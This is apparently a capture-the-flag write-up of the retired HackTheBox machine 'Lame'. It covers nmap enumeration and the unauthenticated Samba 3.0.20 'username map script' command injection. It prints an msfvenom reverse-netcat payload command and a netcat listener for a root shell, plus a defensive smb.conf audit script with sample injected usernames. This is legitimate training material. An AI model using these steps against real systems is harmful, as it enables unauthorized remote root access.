Lame is a retired box on HackTheBox. I am currently preparing for the OSCP, and this box is on TJ_Null's list of OSCP-like VMs, so I am going to do it without Metasploit (since Metasploit is allowed only once in the exam). Let us begin.
I am going to start with nmap.
I did a simple port scan and found ports 21, 22, 139 and 445 to be open.
-p : specifying ports.
-sV : version detection.
Here, I did a service version scan (with the -sV switch of nmap) to find out exactly which software versions are running on those ports.
Let us now dig deeper and do a nmap default script scan (with the -sC switch).
-sC : default script scan.
I could not capture the whole screen as the output was quite large, but the screenshot above has everything we need to know.
Script scan reveals that the box is running Samba 3.0.20-Debian on port 445.
If you search for this Samba version, you will find that it has a command execution vulnerability when the non-default ‘username map script’ configuration option is in use. By supplying a username containing shell metacharacters, anyone can execute arbitrary commands. No authentication is needed to exploit this, because the option is used to map usernames before authentication takes place.
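From the defender's side, the weak spot described above is a configuration setting plus the lack of username filtering. The following Python script is an added example (not part of this write-up or of Samba) that audits an smb.conf for the ‘username map script’ option and flags login names carrying shell metacharacters; the config, the script path and the usernames are constructed samples.

```python
import re

# Characters that would let a username alter a shell command line built from it.
SHELL_METACHARS = set("`$;|&<>()\n")

def find_username_map_script(smb_conf: str):
    """Return the [global] 'username map script' value if it is set, else None."""
    section = None
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":   # smb.conf comment lines start with # or ;
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:
            section = m.group(1).strip().lower()
            continue
        if "=" in line:
            key, value = (s.strip() for s in line.split("=", 1))
            # Samba ignores case and whitespace in parameter names.
            if section == "global" and key.replace(" ", "").lower() == "usernamemapscript":
                return value
    return None

def has_shell_metachars(username: str) -> bool:
    """True if the login name could change the command line built from it."""
    return any(ch in SHELL_METACHARS for ch in username)

def audit(smb_conf: str, usernames):
    """Collect findings: the risky option, plus suspicious login names seen in auth records."""
    findings = []
    script = find_username_map_script(smb_conf)
    if script is not None:
        findings.append(f"[global] sets username map script = {script}; "
                        "remove the option or upgrade Samba")
    for u in usernames:
        if has_shell_metachars(u):
            findings.append(f"login name contains shell metacharacters: {u!r}")
    return findings

# Constructed sample smb.conf and login names, not taken from any real host.
SAMPLE_CONF = """
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
[homes]
   browseable = no
"""
SAMPLE_USERS = ["alice", "bob.smith", "ops`id`", "svc;ls"]
```

Calling audit(SAMPLE_CONF, SAMPLE_USERS) returns three findings: the risky option and the two malformed login names.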
After a Google search, I found this exploit on GitHub.
However, for the exploit to work, you will need to modify it a bit.
You have to put in your IP address and port to get a reverse shell.
I am going to generate the payload with msfvenom and put it in the buf variable.
msfvenom -p cmd/unix/reverse_netcat LHOST=<IP> LPORT=<PORT> -f python
Copy the output and paste it into the exploit code. On a second terminal tab, set up a netcat listener.
nc -nlvp <PORT>
Remember to listen on the same port that you provided in the payload.
Run the Python code, and you should get a shell.
We do not need to escalate our privileges, as we are already root: the injected command runs in the context of the Samba daemon, which runs as root. Now you can read and submit the flags.
So that was the Lame box. Hope you liked it :)
THANK YOU ; )